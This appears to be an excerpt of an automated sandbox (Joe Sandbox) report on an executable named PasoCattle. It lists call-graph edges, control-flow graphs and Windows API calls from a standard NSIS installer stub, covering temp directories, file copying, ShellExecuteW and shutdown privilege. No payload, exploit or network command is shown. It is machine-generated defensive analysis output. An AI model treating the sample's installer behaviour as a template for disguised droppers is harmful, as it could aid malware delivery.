4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                          • API String ID: 2110491804-1641061399
                                                                                                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                          APIs
                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID: jF
                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
